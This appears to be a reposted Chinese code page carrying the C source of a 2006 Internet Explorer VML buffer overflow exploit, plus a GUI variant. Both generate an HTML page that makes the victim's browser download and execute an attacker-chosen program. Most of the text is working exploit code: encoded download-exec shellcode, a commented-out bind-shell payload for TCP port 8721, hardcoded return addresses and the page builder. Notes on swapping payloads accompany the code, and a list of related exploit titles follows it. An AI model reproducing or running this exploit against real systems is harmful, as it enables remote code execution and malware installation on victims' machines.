strcpy(sc,sc_connect_back_for_all_ver);
CODE:
/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:/>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:/>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;
#define NOPSIZE 260
#define MAXURL 60
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
//注意:0x7Ffa4512是中文2k/xp/2k3通用的,建议使用0x7Ffa4512
//除非你要专门对2k测试
// Search Shellcode
unsigned char dc[] =
"/x8B/xDC/xBE/x6F/x6F/x6F/x70/x4E/xBF/x6F/x30/x30/x70/x4F/x43/x39"
"/x3B/x75/xFB/x4B/x80/x33/xEE/x39/x73/xFC/x75/xF7/xFF/xD3";
// Shellcode Start
unsigned char dcstart[] =
"noop";
//关于下面有人说到的shellcode的问题,我在这里考虑换段shellcode
另外给出几段shellcode供测试
//shellcode, 开放 TCP 8721端口
/* "/xe8/x56/x00/x00/x00/x53/
dbe0
x55/x56/x57/x8b/x6c/x24/x18/x8b/x45/x3c"
"/x8b/x54/x05/x78/x01/xea/x8b/x4a/x18/x8b/x5a/x20/x01/xeb/xe3/x32"
"/x49/x8b/x34/x8b/x01/xee/x31/xff/xfc/x31/xc0/xac/x38/xe0/x74/x07"
"/xc1/xcf/x0d/x01/xc7/xeb/xf2/x3b/x7c/x24/x14/x75/xe1/x8b/x5a/x24"
"/x01/xeb/x66/x8b/x0c/x4b/x8b/x5a/x1c/x01/xeb/x8b/x04/x8b/x01/xe8"
"/xeb/x02/x31/xc0/x5f/x5e/x5d/x5b/xc2/x08/x00/x5e/x6a/x30/x59/x64"
"/x8b/x19/x8b/x5b/x0c/x8b/x5b/x1c/x8b/x1b/x8b/x5b/x08/x53/x68/x8e"
"/x4e/x0e/xec/xff/xd6/x89/xc7/x81/xec/x00/x01/x00/x00/x57/x56/x53"
"/x89/xe5/xe8/x27/x00/x00/x00/x90/x01/x00/x00/xb6/x19/x18/xe7/xa4"
"/x19/x70/xe9/xe5/x49/x86/x49/xa4/x1a/x70/xc7/xa4/xad/x2e/xe9/xd9"
"/x09/xf5/xad/xcb/xed/xfc/x3b/x57/x53/x32/x5f/x33/x32/x00/x5b/x8d"
"/x4b/x20/x51/xff/xd7/x89/xdf/x89/xc3/x8d/x75/x14/x6a/x07/x59/x51"
"/x53/xff/x34/x8f/xff/x55/x04/x59/x89/x04/x8e/xe2/xf2/x2b/x27/x54"
"/xff/x37/xff/x55/x30/x31/xc0/x50/x50/x50/x50/x40/x50/x40/x50/xff"
"/x55/x2c/x89/xc7/x31/xdb/x53/x53/x68/x02/x00/x22/x11/x89/xe0/x6a"
"/x10/x50/x57/xff/x55/x24/x53/x57/xff/x55/x28/x53/x54/x57/xff/x55"
"/x20/x89/xc7/x68/x43/x4d/x44/x00/x89/xe3/x87/xfa/x31/xc0/x8d/x7c"
"/x24/xac/x6a/x15/x59/xf3/xab/x87/xfa/x83/xec/x54/xc6/x44/x24/x10"
"/x44/x66/xc7/x44/x24/x3c/x01/x01/x89/x7c/x24/x48/x89/x7c/x24/x4c"
"/x89/x7c/x24/x50/x8d/x44/x24/x10/x54/x50/x51/x51/x51/x41/x51/x49"
"/x51/x51/x53/x51/xff/x75/x00/x68/x72/xfe/xb3/x16/xff/x55/x04/xff"
"/xd0/x89/xe6/xff/x75/x00/x68/xad/xd9/x05/xce/xff/x55/x04/x89/xc3"
"/x6a/xff/xff/x36/xff/xd3/xff/x75/x00/x68/x7e/xd8/xe2/x73/xff/x55"
"/x04/x31/xdb/x53/xff/xd0" */
/*另外一段
The length of encoded shellcode is :418
The new Encoded shellcodeD is:
"/xeb/x16/x5a/x4a/x33/xc9/x8b/xc1/x66/xb9/xa2/x1/x66/x8b/xc1/x80"
"/x34/x2/x99/x48/xe2/xf9/xeb/x5/xe8/xe5/xff/xff/xff"
"/x72/x8a/xcf"
"/xaa/x59/xfd/x12/xd9/xa9/x12/xd9/x95/x12/xe9/x85/x34/x12/xd9/x91"
"/xc7/x5a/x72/xfa/xf9/x12/xf5/xbd/xbd/x12/xdc/xa5/x12/xcd/x9c/xe1"
"/x9a/x4c/x12/xd3/x81/x12/xc3/xb9/x9a/x44/x7a/xad/xd0/x12/xad/x12"
"/x9a/x6c/xaa/x66/xaa/x59/x65/x35/x1d/x59/xed/x9e/x58/x5e/x8a/x9a"
"/x61/x72/x6d/xa2/xe5/xbd/xb1/xec/x78/x12/xc3/xbd/x9a/x44/xff/x12"
"/x95/xd2/x12/xc3/x85/x9a/x44/x12/x9d/x12/x9a/x5c/x10/xdd/xbd/x85"
"/xf8/x5a/x34/xc9/xcb/x71/x33/x66/x66/x66/x10/x9e/x1a/x5d/x91/x1a"
"/x5e/x9d/xa2/x68/xec/x75/x5a/x72/x98/x55/xcc/x12/x75/x1a/x5d/x45"
"/x72/xcd/xaa/x59/xc9/x66/xcc/x71/x50/x5a/xf1/xed/xed/xe9/xa3/xc5"
"/xc5/xa8/xab/xae/xb7/xa9/xb7/xa9/xb7/xa8/xc5/xa8/xb7/xfc/xe1/xfc"
"/x99/x99/x99/x99/x99/x99/x99/x8b/x99/x9e/x99/xd7/x98/x95/x99/x41"
"/x97/xa4/x99/x81/x96/xa4/x99/xc1/x96/xa4/x17/xd7/x97/x75/x34/x40"
"/x9c/x57/xeb/x67/x2a/x8f/xe7/x41/x7b/xea/xbc/x29/x66/x5b/x74/x42"
"/x75/x61/xaf/x83/xb6/xe9/x72/x9b/x72/x9c/x71/x60/x66/x66/x66/xc7"
"/x18/x77/xcc/x99/x99/x99/x10/xec/x61/x18/x5f/xa9/x99/x99/x99/x71"
"/x92/x66/x66/x66/x12/x49/x14/xe4/x45/x12/x57/x1a/x58/x81/x71/xc6"
"/x66/x66/x66/x1a/x58/x9d/xc8/x21/x98/x98/xf6/xf7/x58/x61/x89/xc9"
"/xf1/xec/xeb/xf5/xf4/xcd/x66/xcc/x45/x12/x49/xc0/xc0/xc0/x71/xa6"
"/x66/x66/x66/xaa/x59/x67/x5d/xb2/x79/x10/xfc/x65/xc9/x66/xec/x65"
"/x66/xcc/x69/x9a/x5d/x12/x61/x21/x3a/x11/xf/x8/x6e/x49/x32/x21"
"/xe/x3/xa/x16/x6e/x49/x32/x21/x57/x50/x48/x3/x6e/x49/x32/xaa"
"/x59/xff/x21/xe1/xfc/x32/xaa/x59/xc9/xc9/x66/xec/x65/x66/xec/x61"
"/xf3/x99/x66/xcc/x6d/x1c/x59/x96/x1c/x8c/x66/x66/x66/xaa/x50/x28"
"/xcd/xb2/x78/x12/x65/xce/xaa/x59/x6a/x33/xc6/x5f/x9e/xdd/xaa/x59"
"/x14/xee/xdd/xcf/xce/xc9/xc9/xc9/xc9/xc9/xc9/x66/xec/x65/xc9/x66"
"/xcc/x7d/x6e/x49/xc9/x66/xaf/x66/xcc/x79/x70/x7a/x67/x66/x66";
*/
//the code is test http://127.0.0.1/1.exe
//Encode=0x99 equal 153(dec)
//Use UrlMode
//The length of new encoded URL shellcode_D is:447 bytes
//以上代码来自于一个shellcode生成器,我没时间写完整的shellcode生成代码了,所以通用程序就暂时搁置吧,不过自己改改代码,写个自己临时使用的代码应该没问题了,哪位兄弟有时间就写个更加完美的版本吧
//下面这段shellcode是nop原来的,有人说有问题,可以换成其他的shellcode试试
// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"/x07/x4B/xEE/xEE/xEE/xB1/x8A/x4F/xDE/xEE/xEE/xEE/x65/xAE/xE2/x65"
"/x9E/xF2/x43/x65/x86/xE6/x65/x19/x84/xEA/xB7/x06/xAB/xEE/xEE/xEE"
"/x0C/x17/x86/x81/x80/xEE/xEE/x86/x9B/x9C/x82/x83/xBA/x11/xF8/x7B"
"/x06/xDE/xEE/xEE/xEE/x6D/x02/xCE/x65/x32/x84/xCE/xBD/x11/xB8/xEA"
"/x29/xEA/xED/xB2/x8F/xC0/x8B/x29/xAA/xED/xEA/x96/x8B/xEE/xEE/xDD"
"/x2E/xBE/xBE/xBD/xB9/xBE/x11/xB8/xFE/x65/x32/xBE/xBD/x11/xB8/xE6"
"/x84/xEF/x11/xB8/xE2/xBF/xB8/x65/x9B/xD2/x65/x9A/xC0/x96/xED/x1B"
"/xB8/x65/x98/xCE/xED/x1B/xDD/x27/xA7/xAF/x43/xED/x2B/xDD/x35/xE1"
"/x50/xFE/xD4/x38/x9A/xE6/x2F/x25/xE3/xED/x34/xAE/x05/x1F/xD5/xF1"
"/x9B/x09/xB0/x65/xB0/xCA/xED/x33/x88/x65/xE2/xA5/x65/xB0/xF2/xED"
"/x33/x65/xEA/x65/xED/x2B/x45/xB0/xB7/x2D/x06/xB8/x11/x11/x11/x60"
"/xA0/xE0/x02/x2F/x97/x0B/x56/x76/x10/x64/xE0/x90/x36/x0C/x9D/xD8"
"/xF4/xC1/x9E";
// Shellcode End
unsigned char dcend[] =
"n00p";
// HTML Header
char * header =
"<html xmlns:v=/"urn:schemas-microsoft-com:vml/">/n"
"<head>/n"
"<title>XSec.org</title>/n"
"<style>/n"
"v//:* { behavior: url(#default#VML); }/n"
"</style>/n"
"</head>/n"
"<body>/n"
"<v:rect style=/"width:20pt;height:20pt/" fillcolor=/"red/">/n"
"<v:fill method=/"";
char * footer =
"/"/>/n"
"</v:rect>/n"
"</body>/n"
"</html>/n"
;
// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;
for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];
fprintf(fp, "&#%d;", ncr);
}
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;
unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;
if (argc < 2)
{
printf("Windows VML Download Exec Exploit/n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org/n");
//printf("!!! 0Day !!! Please Keep Private!!!/n");
printf("/r/nUsage: %s <URL> [htmlfile]/r/n/n", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
10 || strlen(url) > MAXURL)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes./n", MAXURL);
return;
}
printf("[+] download url:%s/n", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s/n", file);
fp = fopen(file, "w+b");
//fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!/n");
return;
}
// print html header
fprintf(fp, "%s", header);
fflush(fp);
for(i=0; i<NOPSIZE; i++)
{
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");
}
fflush(fp);
// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);
memcpy(buf, &ret, 4);
psize = 4+8+0x10;
memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;
memcpy(buf+psize, dcstart, 4);
psize += 4;
sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;
// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);
for(i=0; i<strlen(url)+1; i++)
{
burl[i] = url[i] ^ 0xee;
}
memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;
memcpy(buf+psize, dcend, 4);
psize += 4;
// print NCR
convert2ncr(buf, psize);
printf("[+] buff size %d bytes/n", psize);
// print html footer
fprintf(fp, "%s", footer);
fflush(fp);
printf("[+] exploit write to %s success!/n", file);
}
CODE:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "resource.h"
FILE *fp = NULL;
HWND hdlg;
#define NOPSIZE 260
#define MAXURL 60
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);
/* Search Shellcod
/x80/x44/x24/x1A/xC0
/x80/x44/x24/x1B/xFF
*/
unsigned char sh4llcode[] =
"/x80/x44/x24/x2E/xC0/x80/x44/x24/x2F/xFF/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x3C/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
"/x70/x4C/x99/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9D/xC0"
"/x71/xC9/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x98/xC0/x71/xA4/x99/x99/x99/x1A/x5F/x8A/xCF/xDF/x19/xA7/x19"
"/xEC/x63/x19/xAF/x19/xC7/x1A/x75/xB9/x12/x45/xF3/xB9/xCA/x66/xCE"
"/x75/x5E/x9D/x9A/xC5/xF8/xB7/xFC/x5E/xDD/x9A/x9D/xE1/xFC/x99/x99"
"/xAA/x59/xC9/xC9/xCA/xCF/xC9/x66/xCE/x65/x12/x45/xC9/xCA/x66/xCE"
"/x69/xC9/x66/xCE/x6D/xAA/x59/x35/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA"
"/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A/x71/xBF/x66/x66/x66"
"/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB/xFC/xEA/xEA/x99/xDE"
"/xFC/xED/xCA/xE0/xEA/xED/xFC/xF4/xDD/xF0/xEB/xFC/xFA/xED/xF6/xEB"
"/xE0/xD8/x99/xCE/xF0/xF7/xDC/xE1/xFC/xFA/x99/xDC/xE1/xF0/xED/xCD"
"/xF1/xEB/xFC/xF8/xFD/x99/xD5/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB"
"/xE0/xD8/x99/xEC/xEB/xF5/xF4/xF6/xF7/x99/xCC/xCB/xD5/xDD/xF6/xEE"
"/xF7/xF5/xF6/xF8/xFD/xCD/xF6/xDF/xF0/xF5/xFC/xD8/x99";
// HTML Header
char * header =
"<html xmlns:v=/"urn:schemas-microsoft-com:vml/">/n"
"<head>/n"
"<title>XSec.org</title>/n"
"<style>/n"
"v//:* { behavior: url(#default#VML); }/n"
"</style>/n"
"</head>/n"
"<body>/n"
"<v:rect style=/"width:20pt;height:20pt/" fillcolor=/"red/">/n"
"<v:fill method=/"";
char * footer =
"/"/>/n"
"</v:rect>/n"
"</body>/n"
"</html>/n"
;
// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;
for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];
fprintf(fp, "&#%d;", ncr);
}
}
void create(char* url)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;
unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;
fp = fopen("test.html", "w+b");
if(!fp)
{
return;
}
// print html header
fprintf(fp, "%s", header);
fflush(fp);
for(i=0; i<NOPSIZE; i++)
{
fprintf(fp, "A");
}
fflush(fp);
// print shellcode
memset(buf, 0x90, sizeof(buf));
memcpy(buf, &ret, 4);
psize = 4+8+0x10;
memcpy(buf+psize, sh4llcode, sizeof(sh4llcode)-1);//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(sh4llcode)-1;
memcpy(buf+psize, url, strlen(url));//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += strlen(url);
BYTE end = 0x80;
memcpy(buf+psize, &end, 1);
psize += 1;
// print NCR
convert2ncr(buf, psize);
// print html footer
fprintf(fp, "%s", footer);
fflush(fp);
}
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
DialogBox(hInstance,(LPCTSTR)IDD_DIALOG1,NULL,(DLGPROC)DialogProc);
return 0;
}
INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hdlg = hwndDlg;
return true;
case WM_COMMAND:
if (LOWORD(wParam) == IDOK)
{
char url[256];
ZeroMemory(url,256);
GetDlgItemText(hdlg,IDC_EDIT1,url,256);
create(url);
MessageBox(hwndDlg,"恭喜,test.html已生成!","提示",MB_ICONINFORMATION);
}
if (LOWORD(wParam) == IDCANCEL)
{
EndDialog(hwndDlg, LOWORD(wParam));
PostQuitMessage(0);
}
break;
}
return 0;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Internet Explorer COM Object Heap Overflow Download Exec Exploit
- 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
- MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- PEiD &amp;lt;= 0.92 Buffer Overflow Exploit
- VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- Microsoft Word Buffer Overflow (Exploit 2)
- Microsoft Word Buffer Overflow (Exploit 2)
- mo_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
- Download Internet Explorer Administration Kit 6 Service Pack 1
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- 【实战】Internet Explorer Object Type Property Overflow 的研究心得
- WinRAR 3.x LHA Buffer Overflow Exploit
- Buffer Overflow Exploit
- Microsoft Internet Explorer .ANI Files Handling Exploit (MS05-002)
- Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
- ZDI-07-048: Microsoft Internet Explorer substringData() Heap Overflow
- MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
- The Research of the MS05039 Buffer Overflow Exploit Worm